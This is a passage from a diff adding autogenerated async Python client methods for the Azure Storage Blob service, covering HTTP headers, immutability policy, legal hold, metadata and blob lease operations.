lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _blob_cache_control = None + _blob_content_type = None + _blob_content_md5 = None + _blob_content_encoding = None + _blob_content_language = None + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _blob_content_disposition = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + + request = build_set_http_headers_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_md5=_blob_content_md5, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_content_disposition=_blob_content_disposition, + request_id_parameter=request_id_parameter, + template_url=self.set_http_headers.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_http_headers.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Immutability Policy operation sets the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_set_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + if_unmodified_since=_if_unmodified_since, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + template_url=self.set_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def delete_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + + request = build_delete_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.delete_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_legal_hold( # pylint: disable=inconsistent-return-statements + self, + legal_hold: bool, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """The Set Legal Hold operation sets a legal hold on the blob. + + :param legal_hold: Specified if a legal hold should be set on the blob. + :type legal_hold: bool + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "legalhold". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "legalhold") # type: str + + + request = build_set_legal_hold_request( + url=self._config.url, + comp=comp, + version=self._config.version, + legal_hold=legal_hold, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_legal_hold.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_legal_hold.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Blob Metadata operation sets user-defined metadata for the specified blob as one or + more name-value pairs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_set_metadata_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + duration: Optional[int] = None, + proposed_lease_id: Optional[str] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + proposed_lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + break_period: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining 